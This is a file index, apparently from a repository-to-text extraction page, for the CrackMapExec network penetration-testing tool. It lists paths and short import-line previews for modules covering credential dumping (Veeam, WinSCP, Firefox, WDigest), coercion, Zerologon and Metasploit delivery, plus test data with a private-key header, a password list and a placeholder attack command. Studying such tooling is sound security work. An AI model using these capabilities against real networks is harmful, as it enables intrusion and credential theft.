"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\nfrom impacket.ld"
},
{
"path": "cme/modules/rdcman.py",
"chars": 7811,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom dploot.triage.rdg import RDGTriage\nfrom dploot.triage.masterkeys im"
},
{
"path": "cme/modules/rdp.py",
"chars": 16003,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\nfrom cme.connection import dcom_FirewallChecker\n\nf"
},
{
"path": "cme/modules/reg-query.py",
"chars": 7224,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerp"
},
{
"path": "cme/modules/runasppl.py",
"chars": 894,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n name = \"runasppl\"\n description = \"Check if the "
},
{
"path": "cme/modules/scan-network.py",
"chars": 11972,
"preview": "# Credit to https://twitter.com/snovvcrash/status/1550518555438891009\n# Credit to https://github.com/dirkjanm/adidnsdump"
},
{
"path": "cme/modules/scuffy.py",
"chars": 3049,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Origin"
},
{
"path": "cme/modules/shadowcoerce.py",
"chars": 10106,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport time\nfrom impacket import system_errors\nfrom impacket.dcerpc.v5 i"
},
{
"path": "cme/modules/slinky.py",
"chars": 2918,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pylnk3\nimport ntpath\nfrom sys import exit\n\n\nclass CMEModule:\n "
},
{
"path": "cme/modules/spider_plus.py",
"chars": 23787,
"preview": "#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\nimport json\r\nimport errno\r\nimport os\r\nimport time\r\nimport traceback\r\n"
},
{
"path": "cme/modules/spooler.py",
"chars": 5442,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examp"
},
{
"path": "cme/modules/subnets.py",
"chars": 5547,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.ldap import ldapasn1 as ldapasn1_impacket\n\n\ndef searchResE"
},
{
"path": "cme/modules/teams_localdb.py",
"chars": 2335,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport sqlite3\n\n\nclass CMEModule:\n name = \"teams_localdb\"\n descrip"
},
{
"path": "cme/modules/test_connection.py",
"chars": 1212,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Executes the Test-Co"
},
{
"path": "cme/modules/trust.py",
"chars": 4327,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nclass CMEModule:\n '''\n Extract all Trust Relationships, Trusti"
},
{
"path": "cme/modules/uac.py",
"chars": 1426,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\n\nfrom impacket.dcerpc.v5 import rrp\nfrom impacket.examples"
},
{
"path": "cme/modules/user_desc.py",
"chars": 7483,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom datetime import datetime\nfrom impacket.lda"
},
{
"path": "cme/modules/veeam_dump.py",
"chars": 8955,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Initially created by @sadshade, all output to him:\n# https://github.com"
},
{
"path": "cme/modules/wcc.py",
"chars": 34919,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport logging\nimport operator\nimport sys\nimport time\nfrom t"
},
{
"path": "cme/modules/wdigest.py",
"chars": 5288,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerp"
},
{
"path": "cme/modules/web_delivery.py",
"chars": 1808,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom sys import exit\n\n\nclass CMEModule:\n \"\"\"\n Kicks off a Metasplo"
},
{
"path": "cme/modules/webdav.py",
"chars": 1651,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.protocols.smb.remotefile import RemoteFile\nfrom impacket import"
},
{
"path": "cme/modules/whoami.py",
"chars": 3294,
"preview": "class CMEModule:\n \"\"\"\n Basic enumeration of provided user information and privileges\n Module by spyr0 (@spyr0-s"
},
{
"path": "cme/modules/winscp_dump.py",
"chars": 19875,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# If you are looking for a local Version, the baseline code is from https"
},
{
"path": "cme/modules/wireless.py",
"chars": 4414,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom dploot.triage.masterkeys import MasterkeysTriage\nfrom dploot.lib.ta"
},
{
"path": "cme/modules/zerologon.py",
"chars": 4161,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# everything is comming from https://github.com/dirkjanm/CVE-2020-1472\n# "
},
{
"path": "cme/parsers/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/parsers/ip.py",
"chars": 973,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom ipaddress import ip_address, ip_network, summarize_address_range, i"
},
{
"path": "cme/parsers/nessus.py",
"chars": 1520,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport xmltodict\n\n# Ideally i'd like to be able to pull this info out dy"
},
{
"path": "cme/parsers/nmap.py",
"chars": 1375,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom libnmap.parser import NmapParser\nfrom cme.logger import cme_logger\n"
},
{
"path": "cme/paths.py",
"chars": 597,
"preview": "import os\nimport sys\nimport cme\n\nCME_PATH = os.path.expanduser(\"~/.cme\")\nTMP_PATH = os.path.join(\"/tmp\", \"cme_hosted\")\ni"
},
{
"path": "cme/protocols/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/ftp/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/ftp/database.py",
"chars": 13825,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.dialects.sqlite import Insert\nf"
},
{
"path": "cme/protocols/ftp/db_navigator.py",
"chars": 6347,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_table, print_help\n\n\nclass"
},
{
"path": "cme/protocols/ftp/proto_args.py",
"chars": 453,
"preview": "def proto_args(parser, std_parser, module_parser):\n ftp_parser = parser.add_parser(\"ftp\", help=\"own stuff using FTP\","
},
{
"path": "cme/protocols/ftp.py",
"chars": 3963,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom cme.config import process_secret\nfrom cme.connection import *\nfrom c"
},
{
"path": "cme/protocols/ldap/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/ldap/bloodhound.py",
"chars": 4689,
"preview": "import sys, time\n\nfrom cme.logger import CMEAdapter\nfrom bloodhound.ad.domain import ADDC\nfrom bloodhound.enumeration.co"
},
{
"path": "cme/protocols/ldap/database.py",
"chars": 2868,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.orm import sessionmaker, scoped"
},
{
"path": "cme/protocols/ldap/db_navigator.py",
"chars": 581,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(Da"
},
{
"path": "cme/protocols/ldap/gmsa.py",
"chars": 1494,
"preview": "from impacket.structure import Structure\n\n\nclass MSDS_MANAGEDPASSWORD_BLOB(Structure):\n structure = (\n (\"Versi"
},
{
"path": "cme/protocols/ldap/kerberos.py",
"chars": 11355,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\nfrom binascii import hexlify, unhexlify\nfrom datetime impo"
},
{
"path": "cme/protocols/ldap/laps.py",
"chars": 11720,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pyasn1.codec.der import decoder\nfrom pyasn1_modules import rfc5652\n"
},
{
"path": "cme/protocols/ldap/proto_args.py",
"chars": 3711,
"preview": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n ldap_parser = parser.add_p"
},
{
"path": "cme/protocols/ldap.py",
"chars": 63656,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# from https://github.com/SecureAuthCorp/impacket/blob/master/examples/Ge"
},
{
"path": "cme/protocols/mssql/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/mssql/database.py",
"chars": 12992,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy import MetaData, func, Table, s"
},
{
"path": "cme/protocols/mssql/db_navigator.py",
"chars": 5906,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.helpers.misc import validate_ntlm\nfrom cme.cmedb import Databas"
},
{
"path": "cme/protocols/mssql/mssqlexec.py",
"chars": 3685,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport binascii\nfrom cme.logger import cme_logger\n\n\nclass MSSQLEXEC:\n "
},
{
"path": "cme/protocols/mssql/proto_args.py",
"chars": 3002,
"preview": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n mssql_parser = parser.add_"
},
{
"path": "cme/protocols/mssql.py",
"chars": 16668,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nimport os\nfrom io import StringIO\n\nfrom cme.config import "
},
{
"path": "cme/protocols/rdp/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/rdp/database.py",
"chars": 2923,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom pathlib import Path\n\nfrom sqlalchemy.orm import sessionmaker, scoped"
},
{
"path": "cme/protocols/rdp/db_navigator.py",
"chars": 581,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(Da"
},
{
"path": "cme/protocols/rdp/proto_args.py",
"chars": 1389,
"preview": "def proto_args(parser, std_parser, module_parser):\n rdp_parser = parser.add_parser('rdp', help=\"own stuff using RDP\","
},
{
"path": "cme/protocols/rdp.py",
"chars": 16275,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nfrom datetime import datetime\nfrom os import ge"
},
{
"path": "cme/protocols/smb/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/smb/atexec.py",
"chars": 8226,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom impacket.dcerpc.v5 import tsch, transport\nfrom impacket.d"
},
{
"path": "cme/protocols/smb/database.py",
"chars": 38935,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport base64\nimport warnings\nfrom datetime import datetime\nfrom pathlib "
},
{
"path": "cme/protocols/smb/db_navigator.py",
"chars": 27106,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.helpers.misc import validate_ntlm\nfrom cme.cmedb import Databas"
},
{
"path": "cme/protocols/smb/firefox.py",
"chars": 9884,
"preview": "#!/usr/bin/env python3\nfrom base64 import b64decode\nfrom binascii import unhexlify\nfrom hashlib import pbkdf2_hmac, sha1"
},
{
"path": "cme/protocols/smb/mmcexec.py",
"chars": 10251,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Copyright (c) 2003-2016 CORE Security Technologies\n#\n# This software is"
},
{
"path": "cme/protocols/smb/passpol.py",
"chars": 8732,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Stolen from https://github.com/Wh1t3Fox/polenum\n\nfrom impacket.dcerpc.v"
},
{
"path": "cme/protocols/smb/proto_args.py",
"chars": 9099,
"preview": "def proto_args(parser, std_parser, module_parser):\n smb_parser = parser.add_parser(\"smb\", help=\"own stuff using S"
},
{
"path": "cme/protocols/smb/remotefile.py",
"chars": 1540,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom impacket.smb3structs import FILE_READ_DATA, FILE_WRITE_DATA\n\n\nclass "
},
{
"path": "cme/protocols/smb/samrfunc.py",
"chars": 9470,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Majorly stolen from https://gist.github.com/ropnop/7a41da7aabb8455d0898"
},
{
"path": "cme/protocols/smb/samruser.py",
"chars": 4847,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Stolen from Impacket\n\nfrom impacket.dcerpc.v5 import transport, samr\nfr"
},
{
"path": "cme/protocols/smb/smbexec.py",
"chars": 9530,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nfrom os.path import join as path_join\nfrom time import sleep\nf"
},
{
"path": "cme/protocols/smb/smbspider.py",
"chars": 9338,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom time import strftime, localtime\nfrom cme.protocols.smb.remotefile i"
},
{
"path": "cme/protocols/smb/wmiexec.py",
"chars": 6933,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\nimport os\nfrom time import sleep\nfrom cme.connection impor"
},
{
"path": "cme/protocols/smb.py",
"chars": 74814,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport ntpath\nimport hashlib\nimport binascii\nfrom io import StringIO\nfro"
},
{
"path": "cme/protocols/ssh/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/ssh/database.py",
"chars": 19001,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom sqlalchemy.dialects.sqlite import Insert\nfrom sqlalchemy.orm import "
},
{
"path": "cme/protocols/ssh/db_navigator.py",
"chars": 12425,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_table, print_help\n\n\nclass"
},
{
"path": "cme/protocols/ssh/proto_args.py",
"chars": 841,
"preview": "def proto_args(parser, std_parser, module_parser):\n ssh_parser = parser.add_parser(\"ssh\", help=\"own stuff using SSH\","
},
{
"path": "cme/protocols/ssh.py",
"chars": 6872,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\n\nfrom io import StringIO\n\nimport paramiko\n\nfrom cme.config"
},
{
"path": "cme/protocols/vnc/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/vnc/database.py",
"chars": 3149,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy import MetaData, Table\nfrom sql"
},
{
"path": "cme/protocols/vnc/db_navigator.py",
"chars": 581,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(Da"
},
{
"path": "cme/protocols/vnc/proto_args.py",
"chars": 664,
"preview": "def proto_args(parser, std_parser, module_parser):\n vnc_parser = parser.add_parser(\"vnc\", help=\"own stuff using VNC\","
},
{
"path": "cme/protocols/vnc.py",
"chars": 4422,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport asyncio\nimport os\nfrom datetime import datetime\n\nfrom aardwolf.co"
},
{
"path": "cme/protocols/winrm/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/protocols/winrm/database.py",
"chars": 17008,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.dialects.sqlite import Insert\nf"
},
{
"path": "cme/protocols/winrm/db_navigator.py",
"chars": 9048,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help, print_table\nfrom cm"
},
{
"path": "cme/protocols/winrm/proto_args.py",
"chars": 3307,
"preview": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n winrm_parser = parser.add_"
},
{
"path": "cme/protocols/winrm.py",
"chars": 17033,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport binascii\nimport hashlib\nimport os\nimport requests\n\nfrom io import "
},
{
"path": "cme/protocols/wmi/__init__.py",
"chars": 1,
"preview": "\n"
},
{
"path": "cme/protocols/wmi/database.py",
"chars": 2868,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pathlib import Path\nfrom sqlalchemy.orm import sessionmaker, scoped"
},
{
"path": "cme/protocols/wmi/db_navigator.py",
"chars": 581,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom cme.cmedb import DatabaseNavigator, print_help\n\n\nclass navigator(Da"
},
{
"path": "cme/protocols/wmi/proto_args.py",
"chars": 3522,
"preview": "from argparse import _StoreTrueAction\n\ndef proto_args(parser, std_parser, module_parser):\n wmi_parser = parser.add_pa"
},
{
"path": "cme/protocols/wmi/wmiexec.py",
"chars": 5411,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# Author: xiaolichan\n# Link: https://github.com/XiaoliChan/wmiexec-Re"
},
{
"path": "cme/protocols/wmi/wmiexec_event.py",
"chars": 10900,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# Author: xiaolichan\n# Link: https://github.com/XiaoliChan/wmiexec-Pr"
},
{
"path": "cme/protocols/wmi.py",
"chars": 20701,
"preview": "import os, struct, logging\n\nfrom io import StringIO\nfrom six import indexbytes\nfrom datetime import datetime\nfrom cme.co"
},
{
"path": "cme/servers/__init__.py",
"chars": 0,
"preview": ""
},
{
"path": "cme/servers/http.py",
"chars": 3970,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport http.server\nimport threading\nimport ssl\nimport os\nimport sys\nfrom"
},
{
"path": "cme/servers/smb.py",
"chars": 1587,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport threading\nfrom threading import enumerate\nfrom sys import exit\nfr"
},
{
"path": "crackmapexec.spec",
"chars": 1559,
"preview": "# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\na = Analysis(['./cme/crackmapexec.py'],\n pathe"
},
{
"path": "flake.nix",
"chars": 968,
"preview": "{\n description = \"Application packaged using poetry2nix\";\n\n inputs.flake-utils.url = \"github:numtide/flake-utils\";\n i"
},
{
"path": "pyproject.toml",
"chars": 1689,
"preview": "[tool.poetry]\nname = \"crackmapexec\"\nversion = \"6.1.0\"\ndescription = \"A swiss army knife for pentesting networks\"\nauthors"
},
{
"path": "shell.nix",
"chars": 182,
"preview": "{ pkgs ? import <nixpkgs> {} }:\nlet\n myAppEnv = pkgs.poetry2nix.mkPoetryEnv {\n projectDir = ./.;\n editablePackage"
},
{
"path": "tests/README.md",
"chars": 478,
"preview": "# CME Tests\n## Running Tests\n### Unit Tests\n* Install CME (either in venv or via Poetry)\n* Run `pytest` (or `poetry run "
},
{
"path": "tests/data/test_key.priv",
"chars": 2610,
"preview": "-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQA"
},
{
"path": "tests/data/test_passwords.txt",
"chars": 24,
"preview": "Passw0rd!\nNone\nftp\nguest"
},
{
"path": "tests/data/test_users.txt",
"chars": 33,
"preview": "Administrator\nAnonymous\nftp\nguest"
},
{
"path": "tests/e2e_commands.txt",
"chars": 17095,
"preview": "##### SMB\ncrackmapexec smb TARGET_HOST -u USERNAME -p PASSWORD KERBEROS # need an extra space after this command due to "
},
{
"path": "tests/e2e_test.py",
"chars": 3379,
"preview": "import argparse\nimport os\nimport subprocess\nfrom rich.console import Console\n\n\ndef get_cli_args():\n parser = argparse"
},
{
"path": "tests/test_smb_database.py",
"chars": 4694,
"preview": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport pytest\nfrom sqlalchemy import create_engine\nfrom sqlalc"
}
]
About this extraction
This page contains the full source code of the byt3bl33d3r/CrackMapExec GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 194 files (2.9 MB), approximately 773.4k tokens, and a symbol index with 1220 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.